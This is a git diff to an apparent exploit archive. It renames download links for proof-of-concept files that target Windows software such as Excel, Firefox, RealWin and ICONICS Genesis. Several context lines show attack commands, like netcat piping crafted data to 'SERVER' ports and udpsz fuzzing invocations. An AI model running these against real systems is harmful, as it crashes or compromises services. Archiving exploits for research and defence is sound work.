+++ b/platforms/windows/dos/15019.txt
@@ -18,4 +18,4 @@
CVE : CVE-2010-1248
here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/
-here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HFPicture_PoC.rar
\ No newline at end of file
+here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15019.rar (HFPicture_PoC.rar)
\ No newline at end of file
diff --git a/platforms/windows/dos/15027.py b/platforms/windows/dos/15027.py
index 8c05d4f75..165c3f68a 100755
--- a/platforms/windows/dos/15027.py
+++ b/platforms/windows/dos/15027.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-17-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15027.zip (moaub-17-exploit.zip)
'''
'''
Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
diff --git a/platforms/windows/dos/15065.txt b/platforms/windows/dos/15065.txt
index a0751705c..0c9d5f912 100755
--- a/platforms/windows/dos/15065.txt
+++ b/platforms/windows/dos/15065.txt
@@ -18,4 +18,4 @@
CVE : CVE-2010-1248
here is BA : http://www.exploit-db.com/moaub-21-microsoft-excel-wopt-record-parsing-heap-memory-corruption/
-here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-12-exploit.rar
+here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15065.rar (moaub-21-exploit.rar)
diff --git a/platforms/windows/dos/15076.py b/platforms/windows/dos/15076.py
index ae3415f78..38598ee41 100755
--- a/platforms/windows/dos/15076.py
+++ b/platforms/windows/dos/15076.py
@@ -19,7 +19,7 @@
Twitter : @abysssec
http://www.exploit-db.com/moaub-22-adobe-shockwave-director-tsac-chunk-memory-corruption/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-22-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15076.zip (moaub-22-exploit.zip)
'''
diff --git a/platforms/windows/dos/15088.txt b/platforms/windows/dos/15088.txt
index 6224a97b8..26b8b8bbe 100755
--- a/platforms/windows/dos/15088.txt
+++ b/platforms/windows/dos/15088.txt
@@ -18,4 +18,4 @@
CVE : NO CVE
here is BA : http://www.exploit-db.com/moaub-23-microsoft-office-excel-2002-memory-corruption-vulnerability-0day/
-here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-excel-poc.zip
\ No newline at end of file
+here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15088.zip (moaub-23-excel-poc.zip)
\ No newline at end of file
diff --git a/platforms/windows/dos/15096.py b/platforms/windows/dos/15096.py
index 349924249..6fc3f9950 100755
--- a/platforms/windows/dos/15096.py
+++ b/platforms/windows/dos/15096.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-24-mp3-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15096.zip (moaub-24-mp3-exploit.zip)
'''
'''
diff --git a/platforms/windows/dos/15104.py b/platforms/windows/dos/15104.py
index 07f23bff9..8324d9710 100755
--- a/platforms/windows/dos/15104.py
+++ b/platforms/windows/dos/15104.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-25-exploit.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15104.zip (moaub-25-exploit.zip)
'''
diff --git a/platforms/windows/dos/15148.txt b/platforms/windows/dos/15148.txt
index b4f9d819c..55755aaa0 100755
--- a/platforms/windows/dos/15148.txt
+++ b/platforms/windows/dos/15148.txt
@@ -18,5 +18,4 @@
CVE : CVE-2010-1245
here is BA : http://www.exploit-db.com/moaub-29-microsoft-excel-sxview-record-parsing-memory-corruption/
-here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-29-exploit.rar
-t
\ No newline at end of file
+here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15148.rar (moaub-29-exploit.rar)
diff --git a/platforms/windows/dos/15158.py b/platforms/windows/dos/15158.py
index cbb99b698..b8d894ad8 100755
--- a/platforms/windows/dos/15158.py
+++ b/platforms/windows/dos/15158.py
@@ -21,7 +21,7 @@
MOAUB Number : MOAUB-FINAL
http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-30-PoC.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15158.zip (moaub-30-PoC.zip)
'''
import sys
diff --git a/platforms/windows/dos/15248.txt b/platforms/windows/dos/15248.txt
index 8c83b66bb..e5fb0fb0c 100755
--- a/platforms/windows/dos/15248.txt
+++ b/platforms/windows/dos/15248.txt
@@ -102,7 +102,7 @@ of the track.
http://aluigi.org/poc/winamp_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/winamp_1_13Oct10.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15248.zip (winamp_1_13Oct10.zip)
#######################################################################
diff --git a/platforms/windows/dos/15259.txt b/platforms/windows/dos/15259.txt
index 6b1a85022..f801cf04f 100755
--- a/platforms/windows/dos/15259.txt
+++ b/platforms/windows/dos/15259.txt
@@ -75,7 +75,7 @@ caused by the usage of strcpy() with the data supplied by the attacker.
http://aluigi.org/poc/realwin_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15259.zip (realwin_1.zip)
nc SERVER 912 < realwin_1a.dat
nc SERVER 912 < realwin_1b.dat
diff --git a/platforms/windows/dos/15260.txt b/platforms/windows/dos/15260.txt
index b51417b99..c8553ba7e 100755
--- a/platforms/windows/dos/15260.txt
+++ b/platforms/windows/dos/15260.txt
@@ -60,7 +60,7 @@ didn't result exploitable.
http://aluigi.org/poc/unirpcd_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/unirpcd_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15260.zip (unirpcd_1.zip)
#######################################################################
diff --git a/platforms/windows/dos/15407.txt b/platforms/windows/dos/15407.txt
index 7ba7e02da..5e446fe4e 100755
--- a/platforms/windows/dos/15407.txt
+++ b/platforms/windows/dos/15407.txt
@@ -121,4 +121,4 @@ Followup: MachineOwner
3.Proof of concept is in poc.zip file.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15407.zip (poc.zip)
diff --git a/platforms/windows/dos/15419.txt b/platforms/windows/dos/15419.txt
index cd8853b83..2a1d37bd4 100755
--- a/platforms/windows/dos/15419.txt
+++ b/platforms/windows/dos/15419.txt
@@ -1,3 +1,3 @@
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xpl_pdf.bin
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15419.bin (xpl_pdf.bin)
http://extraexploit.blogspot.com/2010/11/full-disclosure-xplpdf-adober-reader-94.html
\ No newline at end of file
diff --git a/platforms/windows/dos/15426.txt b/platforms/windows/dos/15426.txt
index affaf7250..1e5b405bf 100755
--- a/platforms/windows/dos/15426.txt
+++ b/platforms/windows/dos/15426.txt
@@ -58,5 +58,5 @@ short BranchOffset, value -305
BranchOffset is located @ E6h-E7h
-PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe_flash_int_ovrflw_poc.rar
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar)
diff --git a/platforms/windows/dos/15444.zip b/platforms/windows/dos/15444.zip
index 54ae47174..0cf03136c 100755
--- a/platforms/windows/dos/15444.zip
+++ b/platforms/windows/dos/15444.zip
@@ -122,4 +122,4 @@ Followup: MachineOwner
3.PoC is in NtOpenKey_poc.zip file.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/NtOpenKey_poc.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15444.zip (NtOpenKey_poc.zip)
\ No newline at end of file
diff --git a/platforms/windows/dos/15514.txt b/platforms/windows/dos/15514.txt
index e8037d0a5..8e3fe15c3 100755
--- a/platforms/windows/dos/15514.txt
+++ b/platforms/windows/dos/15514.txt
@@ -2,4 +2,4 @@ Foxit Reader 4.1.1 is subject to a stack overflow vulnerability when parsing ove
The included PoC results in a SEH overwrite. The exception must be passed twice in order to reach the overwritten handler.
This vulnerability was reported to the vendor and was patched in Foxit Reader 4.2.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/foxit_411_poc.pdf
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15514.pdf (foxit_411_poc.pdf)
\ No newline at end of file
diff --git a/platforms/windows/dos/15581.txt b/platforms/windows/dos/15581.txt
index 598dd45bb..21bb76a8d 100755
--- a/platforms/windows/dos/15581.txt
+++ b/platforms/windows/dos/15581.txt
@@ -61,4 +61,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4978.php
PoC:
http://www.zeroscience.mk/codes/pocs_ens_ism.rar
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/pocs_ens_ism.rar
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15581.rar (pocs_ens_ism.rar)
\ No newline at end of file
diff --git a/platforms/windows/dos/15992.txt b/platforms/windows/dos/15992.txt
index 63bbb0932..061f8b821 100755
--- a/platforms/windows/dos/15992.txt
+++ b/platforms/windows/dos/15992.txt
@@ -89,7 +89,7 @@ copying the input data in a temporary buffer of about 60 bytes:
http://aluigi.org/testz/udpsz.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15992.zip (udpsz.zip)
udpsz -T -b a -C 020101 SERVER 46823 1000
diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt
index 193f3495c..730275cf0 100755
--- a/platforms/windows/dos/1615.txt
+++ b/platforms/windows/dos/1615.txt
@@ -1,4 +1,4 @@
-# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/excel_03262006.rar
+# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar)
Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
Date : 02/12/2006
diff --git a/platforms/windows/dos/16254.txt b/platforms/windows/dos/16254.txt
index 01f45609a..c4218edf6 100755
--- a/platforms/windows/dos/16254.txt
+++ b/platforms/windows/dos/16254.txt
@@ -44,7 +44,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php
--------
PoC:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nitropdf_poc.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16254.rar (nitropdf_poc.rar)
http://www.zeroscience.mk/codes/nitropdf_poc.rar
--------
\ No newline at end of file
diff --git a/platforms/windows/dos/17023.txt b/platforms/windows/dos/17023.txt
index bbe086c3d..832c324fe 100755
--- a/platforms/windows/dos/17023.txt
+++ b/platforms/windows/dos/17023.txt
@@ -13,8 +13,8 @@ http://aluigi.org/adv/genesis_11-adv.txt
http://aluigi.org/adv/genesis_12-adv.txt
http://aluigi.org/adv/genesis_13-adv.txt
-Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iconics_genesis_adv.tar.gz
-PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/iconics_genesis_poc.tar.gz
+Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz)
+PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz)
#######################################################################
@@ -105,7 +105,7 @@ The Code
===========
http://aluigi.org/poc/genesis_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-1.zip (genesis_1.zip)
#######################################################################
@@ -157,7 +157,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 1 SERVER
@@ -212,7 +212,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 2 SERVER
@@ -280,7 +280,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 3 SERVER
@@ -339,7 +339,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 4 SERVER
@@ -388,7 +388,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 5 SERVER
@@ -437,7 +437,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 6 SERVER
@@ -486,7 +486,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 7 SERVER
@@ -529,7 +529,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 8 SERVER
@@ -574,7 +574,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 9 SERVER
@@ -625,7 +625,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 10 SERVER
@@ -673,7 +673,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 11 SERVER
@@ -718,7 +718,7 @@ The Code
===========
http://aluigi.org/poc/genesis_iof.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/genesis_iof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17023-2.zip (genesis_iof.zip)
genesis_iof 12 SERVER
diff --git a/platforms/windows/dos/17025.txt b/platforms/windows/dos/17025.txt
index af11e54c5..864521208 100755
--- a/platforms/windows/dos/17025.txt
+++ b/platforms/windows/dos/17025.txt
@@ -7,8 +7,8 @@ http://aluigi.org/adv/realwin_6-adv.txt
http://aluigi.org/adv/realwin_7-adv.txt
http://aluigi.org/adv/realwin_8-adv.txt
-Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/datac_realwin_adv.tar.gz
-PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/datac_realwin_poc.tar.gz
+Advisory Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz)
+PoC Archive: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz)
#######################################################################
@@ -54,7 +54,7 @@ The Code
===========
http://aluigi.org/poc/realwin_2.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_2.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-2.zip (realwin_2.zip)
nc SERVER 910 < realwin_2.dat
@@ -89,7 +89,7 @@ The Code
===========
http://aluigi.org/poc/realwin_3.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_3.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-3.zip (realwin_3.zip)
nc SERVER 910 < realwin_3?.dat
@@ -113,7 +113,7 @@ The Code
===========
http://aluigi.org/poc/realwin_4.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_4.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-4.zip (realwin_4.zip)
nc SERVER 910 < realwin_4.dat
@@ -151,7 +151,7 @@ The Code
===========
http://aluigi.org/poc/realwin_5.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_5.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-5.zip (realwin_5.zip)
nc SERVER 910 < realwin_5?.dat
@@ -186,7 +186,7 @@ The Code
===========
http://aluigi.org/poc/realwin_6.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_6.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-6.zip (realwin_6.zip)
nc SERVER 910 < realwin_6?.dat
@@ -227,7 +227,7 @@ The Code
===========
http://aluigi.org/poc/realwin_7.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_7.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-7.zip (realwin_7.zip)
nc SERVER 910 < realwin_7?.dat
@@ -251,7 +251,7 @@ The Code
===========
http://aluigi.org/poc/realwin_8.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_8.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17025-8.zip (realwin_8.zip)
nc SERVER 910 < realwin_8.dat
diff --git a/platforms/windows/dos/1708.txt b/platforms/windows/dos/1708.txt
index 3f415759e..5629a0043 100755
--- a/platforms/windows/dos/1708.txt
+++ b/platforms/windows/dos/1708.txt
@@ -16,6 +16,6 @@ Author: Luigi Auriemma
#######################################################################
-Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-skulltagfs.zip
+Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1708.zip (04232006-skulltagfs.zip)
# milw0rm.com [2006-04-23]
diff --git a/platforms/windows/dos/17398.txt b/platforms/windows/dos/17398.txt
index 0bcf4b09b..3f175e6a5 100755
--- a/platforms/windows/dos/17398.txt
+++ b/platforms/windows/dos/17398.txt
@@ -15,7 +15,7 @@ playlist and the media player will try to generate thumbnail image of the
contents.
File at: http://www.deventum.com/research/Crash_WMplayer.3gp
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Crash_WMplayer.3gp
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17398.3gp (Crash_WMplayer.3gp)
Debug info,
diff --git a/platforms/windows/dos/17399.txt b/platforms/windows/dos/17399.txt
index a181213ec..6c5ebc179 100755
--- a/platforms/windows/dos/17399.txt
+++ b/platforms/windows/dos/17399.txt
@@ -85,5 +85,5 @@ winword!wdGetApplicationObject+0x150fac:
4) POC
===========
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2011-07.doc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17399.doc (PRL-2011-07.doc)
http://www.protekresearchlab.com/exploits/PRL-2011-07.doc
\ No newline at end of file
diff --git a/platforms/windows/dos/17497.txt b/platforms/windows/dos/17497.txt
index 78d1e36c0..494fdc436 100755
--- a/platforms/windows/dos/17497.txt
+++ b/platforms/windows/dos/17497.txt
@@ -43,4 +43,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php
PoC:
- http://www.zeroscience.mk/codes/alplayer_bof.rar
- - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/alplayer_bof.rar
+ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17497.rar (alplayer_bof.rar)
diff --git a/platforms/windows/dos/17544.txt b/platforms/windows/dos/17544.txt
index 6aaffa1d9..ecc300073 100755
--- a/platforms/windows/dos/17544.txt
+++ b/platforms/windows/dos/17544.txt
@@ -166,6 +166,6 @@ corruptions using a standalone file. .
feel free to contact us at : info [at] abysssec.com
PoC link : http://abysssec.com/files/GDI_PoC.zip
-PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/GDI_PoC.zip
+PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17544.zip (GDI_PoC.zip)
diff --git a/platforms/windows/dos/17772.txt b/platforms/windows/dos/17772.txt
index 2a0f139a9..5f6c56676 100755
--- a/platforms/windows/dos/17772.txt
+++ b/platforms/windows/dos/17772.txt
@@ -69,7 +69,7 @@ fwrite().
http://aluigi.org/poc/bwocxrun_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/bwocxrun_1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17772.zip (bwocxrun_1.zip)
#######################################################################
diff --git a/platforms/windows/dos/1781.txt b/platforms/windows/dos/1781.txt
index 2741dc613..a18cf0367 100755
--- a/platforms/windows/dos/1781.txt
+++ b/platforms/windows/dos/1781.txt
@@ -1,5 +1,5 @@
# Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-outgunx.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1781.zip (05132006-outgunx.zip)
# milw0rm.com [2006-05-14]
diff --git a/platforms/windows/dos/1782.txt b/platforms/windows/dos/1782.txt
index 0e66db3e8..d9feaadc5 100755
--- a/platforms/windows/dos/1782.txt
+++ b/platforms/windows/dos/1782.txt
@@ -1,5 +1,5 @@
# Empire <= 4.3.2 (strncat) Denial of Service Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-empiredos.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1782.zip (05132006-empiredos.zip)
# milw0rm.com [2006-05-14]
diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt
index 71e91a316..c27eb9390 100755
--- a/platforms/windows/dos/1783.txt
+++ b/platforms/windows/dos/1783.txt
@@ -1,5 +1,5 @@
# Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-genecysbof.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip)
# milw0rm.com [2006-05-14]
diff --git a/platforms/windows/dos/17830.txt b/platforms/windows/dos/17830.txt
index 879d94135..4285c6cfa 100755
--- a/platforms/windows/dos/17830.txt
+++ b/platforms/windows/dos/17830.txt
@@ -208,7 +208,7 @@ flow and executing code under SYSTEM privileges.
http://aluigi.org/testz/udpsz.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17830.zip (udpsz.zip)
udpsz -C 00140004 -b a -l 0 -T 0xffffffff SERVER 42 0x140008
diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt
index ca61ecf22..135cc6679 100755
--- a/platforms/windows/dos/1784.txt
+++ b/platforms/windows/dos/1784.txt
@@ -1,5 +1,5 @@
# Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05132006-raydiumx.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip)
diff --git a/platforms/windows/dos/17918.txt b/platforms/windows/dos/17918.txt
index 99fe3cf41..83a450ff6 100755
--- a/platforms/windows/dos/17918.txt
+++ b/platforms/windows/dos/17918.txt
@@ -114,6 +114,6 @@ REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php
Proof Of Concept:
-----------------
http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes)
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/brush_gradiently.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17918.rar (brush_gradiently.rar)
diff --git a/platforms/windows/dos/1792.txt b/platforms/windows/dos/1792.txt
index f3d55565b..037b7e756 100755
--- a/platforms/windows/dos/1792.txt
+++ b/platforms/windows/dos/1792.txt
@@ -1,3 +1,3 @@
# GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05152006-udpsz.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1792.zip (05152006-udpsz.zip)
diff --git a/platforms/windows/dos/17978.txt b/platforms/windows/dos/17978.txt
index aa205c28d..d97fc582e 100755
--- a/platforms/windows/dos/17978.txt
+++ b/platforms/windows/dos/17978.txt
@@ -9,7 +9,7 @@
Exploit is downloadable from:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/my.fon.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17978.tar.gz (my.fon.tar.gz)
http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/
diff --git a/platforms/windows/dos/18488.txt b/platforms/windows/dos/18488.txt
index 6aa44fb9f..ab54e0db2 100755
--- a/platforms/windows/dos/18488.txt
+++ b/platforms/windows/dos/18488.txt
@@ -76,7 +76,7 @@ to change the NM_A_PARM1 field if you want to use another one.
http://aluigi.org/poc/nmma_x.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nmma_x.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18488.zip (nmma_x.zip)
nmma_x 3 SERVER
diff --git a/platforms/windows/dos/18489.txt b/platforms/windows/dos/18489.txt
index ff4d8d9b1..1c6dc156c 100755
--- a/platforms/windows/dos/18489.txt
+++ b/platforms/windows/dos/18489.txt
@@ -72,7 +72,7 @@ service is multi-thread) may be possible to control the corruption.
http://aluigi.org/poc/nmma_x.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nmma_x.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18489.zip (nmma_x.zip)
nmma_x 1 SERVER
diff --git a/platforms/windows/dos/18586.txt b/platforms/windows/dos/18586.txt
index 65492bfa9..1f850eed4 100755
--- a/platforms/windows/dos/18586.txt
+++ b/platforms/windows/dos/18586.txt
@@ -58,4 +58,4 @@ an heap-based buffer overflow by tricking a user into opening a specially crafte
===========
Here: http://www.protekresearchlab.com/exploits/PRL-2012-06.fpx
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-06.fpx
\ No newline at end of file
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18586.pfx (PRL-2012-06.fpx)
\ No newline at end of file
diff --git a/platforms/windows/dos/20946.txt b/platforms/windows/dos/20946.txt
index a3cc14116..473493f44 100755
--- a/platforms/windows/dos/20946.txt
+++ b/platforms/windows/dos/20946.txt
@@ -10,4 +10,4 @@ Due to the fact that the problem stems from a buffer overflow, there is a possib
